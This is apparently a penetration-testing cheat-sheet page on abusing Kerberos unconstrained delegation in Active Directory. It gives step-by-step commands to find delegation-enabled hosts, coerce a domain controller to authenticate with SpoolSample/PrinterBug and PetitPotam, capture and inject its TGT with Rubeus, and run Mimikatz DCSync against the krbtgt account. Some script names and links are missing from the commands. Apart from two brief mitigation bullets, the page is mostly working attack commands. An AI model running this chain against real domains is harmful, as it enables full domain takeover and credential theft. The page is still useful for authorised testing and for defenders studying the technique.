Skip to content

Kerberos Delegation - Unconstrained Delegation

The user sends a ST to access the service, along with their TGT, and then the service can use the user's TGT to request a ST for the user to any other service and impersonate the user. -

When a user authenticates to a computer that has unrestricted kerberos delegation privilege turned on, authenticated user's TGT ticket gets saved to that computer's memory.

⚠ Unconstrained delegation used to be the only option available in Windows 2000

Warning Remember to coerce to a HOSTNAME if you want a Kerberos Ticket

SpoolService Abuse with Unconstrained Delegation

The goal is to gain DC Sync privileges using a computer account and the SpoolService bug.

Requirements: - Object with Property Trust this computer for delegation to any service (Kerberos only) - Must have ADS_UF_TRUSTED_FOR_DELEGATION - Must not have ADS_UF_NOT_DELEGATED flag - User must not be in the Protected Users group - User must not have the flag Account is sensitive and cannot be delegated

Find delegation

⚠ : Domain controllers usually have unconstrained delegation enabled.
Check the TRUSTED_FOR_DELEGATION property.

  • ADModule
    # From
    PS> Get-ADComputer -Filter {TrustedForDelegation -eq $True}
  • bloodyAD

    bloodyAD -u user -p 'totoTOTOtoto1234*' -d crash.lab --host get search --filter '(&(objectCategory=Computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))' --attr sAMAccountName,userAccountControl

  • ldapdomaindump

    $> ldapdomaindump -u "DOMAIN\\Account" -p "Password123*"   
    grep TRUSTED_FOR_DELEGATION domain_computers.grep

  • netexec module

    nxc ldap -u username -p password --trusted-for-delegation

  • BloodHound: MATCH (c:Computer {unconstraineddelegation:true}) RETURN c

  • Powershell Active Directory module: Get-ADComputer -LDAPFilter "(&(objectCategory=Computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" -Properties DNSHostName,userAccountControl

SpoolService status

Check if the spool service is running on the remote host

ls \\dc01\pipe\spoolss
python DOMAIN/user:password@

Monitor with Rubeus

Monitor incoming connections from Rubeus.

Rubeus.exe monitor /interval:1 

Force a connect back from the DC

Due to the unconstrained delegation, the TGT of the computer account (DC$) will be saved in the memory of the computer with unconstrained delegation. By default the domain controller computer account has DCSync rights over the domain object.

SpoolSample is a PoC to coerce a Windows host to authenticate to an arbitrary server using a "feature" in the MS-RPRN RPC interface.

# From
# DC01.HACKER.LAB is the domain controller we want to compromise
# HELPDESK.HACKER.LAB is the machine with delegation enabled that we control.

# From 'domain/username:password'@<VICTIM-DC-NAME> <UNCONSTRAINED-SERVER-DC-NAME>

# From
python -d domain -u username -p password <UNCONSTRAINED-SERVER-DC-NAME> <VICTIM-DC-NAME>

If the attack worked you should get a TGT of the domain controller.

Load the ticket

Extract the base64 TGT from Rubeus output and load it to our current session.

.\Rubeus.exe asktgs /ticket:<ticket base64> /service:LDAP/dc.lab.local,cifs/dc.lab.local /ptt

Alternatively you could also grab the ticket using Mimikatz : mimikatz # sekurlsa::tickets

Then you can use DCsync or another attack : mimikatz # lsadump::dcsync /user:HACKER\krbtgt


  • Ensure sensitive accounts cannot be delegated
  • Disable the Print Spooler Service

MS-EFSRPC Abuse with Unconstrained Delegation

Using PetitPotam, another tool to coerce a callback from the targeted machine, instead of SpoolSample.

# Coerce the callback
git clone
python3 -d '' -u '' -p '' $ATTACKER_IP $TARGET_IP

# Extract the ticket
.\Rubeus.exe asktgs /ticket:<ticket base64> /ptt